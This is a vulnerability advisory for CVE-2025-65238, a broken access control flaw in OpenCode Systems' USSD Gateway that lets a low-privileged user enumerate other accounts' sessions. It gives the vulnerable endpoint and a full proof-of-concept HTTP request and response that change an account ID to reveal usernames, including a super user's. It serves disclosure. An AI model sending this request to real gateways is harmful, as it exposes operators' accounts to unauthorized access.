[CVE-2025-65238] USSD Gateway Broken Access Control - Sessions

Technical information about the CVE-2025-65238 in OpenCode USSD GW application.

Description

Broken Access Control in the USSD Gateway application offered by OpenCode Systems allows the user who low privileged access to enumerate all the application sessions. https://www.cve.org/CVERecord?id=CVE-2025-65238

Application Details

• Name: USSD Gateway

• Vendor: OpenCode Systems

• Version: OC Release 5 - Version 6.13.11

Technical Details

• Vulnerable Endpoint: /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider

Exploitation

The vulnerability allows the low privileged user to enumerate the user sessions by inserting the account ID of the user.

From the low privileged user, the exploitation can be done by using the below request

POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]

account_id=33

HTTP/2 200 OK
Date: XXX, XX XXX 2025 xx:xx:xx GMT
[...]

{"10":"REDACTED-USERNAME"}

Additionally you can enumerate different user like a super user by changing the user ID.